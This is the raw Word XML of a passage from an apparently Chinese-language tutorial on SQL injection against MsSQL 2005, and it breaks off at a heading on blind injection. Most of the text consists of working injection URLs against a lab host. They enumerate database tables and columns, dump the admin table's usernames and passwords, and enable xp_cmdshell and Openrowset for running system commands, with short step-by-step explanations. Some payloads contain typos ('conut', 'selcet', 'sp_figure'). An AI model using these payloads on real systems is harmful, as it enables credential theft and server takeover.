    <w:p w14:paraId="34A53870" w14:textId="77777777" w:rsidR="0080071A" w:rsidRPr="00764DAB" w:rsidRDefault="0080071A" w:rsidP="001A202D">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sys].[all_objects]/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417302FE" w14:textId="77777777" w:rsidR="0080071A" w:rsidRPr="00764DAB" w:rsidRDefault="003F7753"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如:</w:t>
      </w:r>
      <w:r w:rsidR="0080071A" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://192.168.1.55/sqlserver/1.aspx?xxser=1%20/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/</w:t>
      </w:r>
      <w:r w:rsidR="0080071A" w:rsidRPr="00C33001">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="0080071A" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/**/name/**/from/**/[</w:t>
      </w:r>
      <w:r w:rsidR="0080071A" w:rsidRPr="00C33001">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>TestDB</w:t>
      </w:r>
      <w:r w:rsidR="0080071A" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>].[sys].[all_objects]/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7446B019" w14:textId="77777777" w:rsidR="001723E1" w:rsidRDefault="001723E1" w:rsidP="001A202D">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09694E55" wp14:editId="27EECFDF">
            <wp:extent cx="5274310" cy="2701253"/>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274310" cy="2701253"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DEA984" w14:textId="77777777" w:rsidR="009B3884" w:rsidRPr="00764DAB" w:rsidRDefault="009B3884"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指定所要列的数据库名，修改黑色加粗部分的数字1累加，就可以逐个猜出指定数据库中的所有数据表名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3719FF4D" w14:textId="77777777" w:rsidR="009B3884" w:rsidRPr="00276D91" w:rsidRDefault="009B3884"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3.爆字段名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B63F859" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00764DAB" w:rsidRDefault="009B3884"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获得表名后，就可以爆表中的字段名了。首先，提交如下查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453B6432" w14:textId="77777777" w:rsidR="00385D9B" w:rsidRPr="00764DAB" w:rsidRDefault="00385D9B" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://192.168.1.55/sqlserver/1.aspx?xxser=1and (select top 1 cast([id] as nvarchar(20))%2bchar(94) from [</w:t>
      </w:r>
      <w:r w:rsidRPr="00C33001">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>TestDB</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>].[sys].[sysobjects] where name=</w:t>
      </w:r>
      <w:r w:rsidR="007569BD" w:rsidRPr="00C33001">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0x410064006D0069006E00</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)&gt;0--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127FA15E" w14:textId="77777777" w:rsidR="007569BD" w:rsidRDefault="007569BD" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FA9724F" wp14:editId="7293016F">
            <wp:extent cx="5274310" cy="2480401"/>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5274310" cy="2480401"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="455E4666" w14:textId="77777777" w:rsidR="00385D9B" w:rsidRPr="00764DAB" w:rsidRDefault="00315D1E"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注:</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>name=</w:t>
      </w:r>
      <w:r w:rsidR="007569BD" w:rsidRPr="00C33001">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0x410064006D0069006E00</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是表名16进制</w:t>
      </w:r>
      <w:r w:rsidR="007569BD" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> ,请看图:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBF9A2F" w14:textId="77777777" w:rsidR="00ED5C6D" w:rsidRPr="00276D91" w:rsidRDefault="007569BD" w:rsidP="001A202D">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CAAFD22" wp14:editId="16BDB3EE">
            <wp:extent cx="5272078" cy="3057525"/>
            <wp:effectExtent l="19050" t="0" r="4772"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274310" cy="3058819"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8AE2D3" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00764DAB" w:rsidRDefault="00361724"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可以爆出指定表</w:t>
      </w:r>
      <w:r w:rsidR="007569BD" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的dbid值，根据表的dbid值才能定位到表中的字段。提交如下查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042CAC1F" w14:textId="77777777" w:rsidR="00ED40FF" w:rsidRPr="00764DAB" w:rsidRDefault="00ED40FF" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLine="42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 and (select cast(conut(1) as nvarchar(20))%2bchar(94) from [</w:t>
      </w:r>
      <w:r w:rsidRPr="00C33001">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>TestDB</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>].[sys].[all_columns] where object_id=</w:t>
      </w:r>
      <w:r w:rsidRPr="00C33001">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2105058535</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)&gt;0--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D3D14B" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00764DAB" w:rsidRDefault="006F4AB1"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可以爆出得到字段列名数目，然后提交以下查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1910EE49" w14:textId="77777777" w:rsidR="00B21088" w:rsidRPr="00644363" w:rsidRDefault="00B21088"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selcet/**/top/**/1/**/cast(name/**/as/**/varchar(500))/**/from/**/(select/**/top/**/</w:t>
      </w:r>
      <w:r w:rsidRPr="00C33001">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00644363">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/**/column_id,name/**/from/**/[数据库名]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3992174C" w14:textId="77777777" w:rsidR="00B21088" w:rsidRPr="00644363" w:rsidRDefault="00B21088"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lastRenderedPageBreak/>
        <w:t>.[sys].[all_columns]/**/where/**/object_id=</w:t>
      </w:r>
      <w:r w:rsidRPr="00C33001">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>dbid 值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3494A1F7" w14:textId="77777777" w:rsidR="00B21088" w:rsidRPr="00644363" w:rsidRDefault="00B21088"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 xml:space="preserve"> /**/order/**/by/**/column_id)/**/t/**/order/**/by/**</w:t>
      </w:r>
      <w:r w:rsidR="00475528" w:rsidRPr="00644363">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00644363">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>column_id/**/desc)&gt;0-</w:t>
      </w:r>
      <w:r w:rsidRPr="00644363">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45165506" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00764DAB" w:rsidRDefault="006F4AB1" w:rsidP="00901209">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通过递增n的值，就可以得到所有字段名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C8AE49" w14:textId="77777777" w:rsidR="00510476" w:rsidRPr="00276D91" w:rsidRDefault="00510476"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4.爆字段内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D2D79A" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00764DAB" w:rsidRDefault="00510476"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获得字段名后，提交如下查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A5E173"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nd/**/(select/**/top/**/1/**/isnull(cast([字段名 1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C6BC96"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s/**/nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([字段名 2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713DAF17"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s/**/nvar</w:t>
      </w:r>
      <w:r w:rsidR="00570029" w:rsidRPr="00644363">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:r w:rsidRPr="00644363">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(4000)),char(32))%2bchar(94)%2bisnull(cast([字段名 3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6672F512"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as/**/nvarchar(4000)),char(32))/**/from/**/[数据库名]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6330AD25"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表名]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6F5D13" w14:textId="77777777" w:rsidR="00806310"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where/**/1=1/**/and/**/id/**/not/**/in/**/(select/**/top/**/0/**/id/**/from/**/[数据库名]..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14528CAE" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00644363" w:rsidRDefault="0080631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hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[表名]/**/where/**/1=1/**/g</w:t>
      </w:r>
      <w:r w:rsidR="00440E2B" w:rsidRPr="00644363">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>roup/**/by/**/id))&gt;0/**/and/**/1=</w:t>
      </w:r>
      <w:r w:rsidRPr="00644363">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEB9C78" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00764DAB" w:rsidRDefault="00512DF7"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即可爆出指定字段内容。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DE7659" w14:textId="77777777" w:rsidR="00440E2B" w:rsidRPr="00764DAB" w:rsidRDefault="00440E2B" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>例如：</w:t>
      </w:r>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://192.168.1.55/sqlserver/1.aspx?xxser=1/**/and/**/(select/**/top/**/1/**/isnull(cast([id]/**/as/**/nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([name]/**/as/**/nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([password]/**/as/**/nvarchar(4000)),char(32))/**/from/**/[testdb]..[admin]/**/where/**/1=1/**/and/**/id/**/not/**/in/**/(select/**/top/**/0/**/id/**/from/**/[testdb]..[admin]/**/where/**/1=1/**/group/**/by/**/id))&gt;0/**/and/**/1=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6EE422" w14:textId="77777777" w:rsidR="00440E2B" w:rsidRDefault="00440E2B" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6832E835" w14:textId="77777777" w:rsidR="00440A12" w:rsidRDefault="00440E2B" w:rsidP="00901209">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06AC7C3E" wp14:editId="222714A4">
            <wp:extent cx="5274310" cy="2257405"/>
            <wp:effectExtent l="19050" t="0" r="254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5274310" cy="2257405"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="04031CD6" w14:textId="77777777" w:rsidR="00440A12" w:rsidRPr="00015E49"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2.3.3</w:t>
      </w:r>
      <w:r w:rsidR="00FF1B9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00440A12" w:rsidRPr="00015E49">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>MsSQL 2005利用扩展存储的注入攻击技术</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06760095" w14:textId="77777777" w:rsidR="00440A12" w:rsidRPr="00764DAB" w:rsidRDefault="00C33001" w:rsidP="00901209">
      <w:pPr>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B35422" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MsSQL 2005默认没有开启xp_cmdshell扩展存储，Openrowset扩展存储也不能使用.如果注入点处是SA权限.可以开启扩展存储后再执行系统命令或查询攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78010880" w14:textId="77777777" w:rsidR="00B8583A" w:rsidRPr="00B8583A" w:rsidRDefault="00B8583A" w:rsidP="001A202D">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B8583A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.开启Openrowset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB0156D"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查询注入语句，即可开启Openrowset扩展存储。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3032EB6A"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EXEC/**/sp_configure/**/'show/**/advanced/*</w:t>
      </w:r>
      <w:r w:rsidR="00BC4271" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*/options',/**/1;RECONFIGURE;--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7DFBCE"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EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7831CD72" w14:textId="77777777" w:rsidR="00B8583A" w:rsidRPr="00BC4271" w:rsidRDefault="00B8583A" w:rsidP="001A202D">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B8583A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.开启xp_cmdshell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A396C9"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查询注入语句.即可开启xp_cmdshell扩展存储。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DC66FA"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EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distribut</w:t>
      </w:r>
      <w:r w:rsidR="00BC4271" w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ed/**/Queries',1;RECONFIGURE;--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39674303" w14:textId="77777777" w:rsidR="00B8583A"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EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_figure/**/'xp_cmdshell',1;RECONFIGURE;--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49829ACA" w14:textId="77777777" w:rsidR="00B35422" w:rsidRPr="00764DAB" w:rsidRDefault="00B8583A"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开启扩展存储后，就可以参照之前版本的MsSQL注入攻击技术.通过扩展存储直接实施服务器攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327902E9" w14:textId="77777777" w:rsidR="007D362F" w:rsidRPr="00015E49" w:rsidRDefault="00316D72" w:rsidP="00604925">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00015E49">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>MsSQL 2005的盲注入攻击技术</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67718214" w14:textId="77777777" w:rsidR="007C5CF9" w:rsidRPr="00764DAB" w:rsidRDefault="007C5CF9" w:rsidP="001A202D">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00764DAB">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
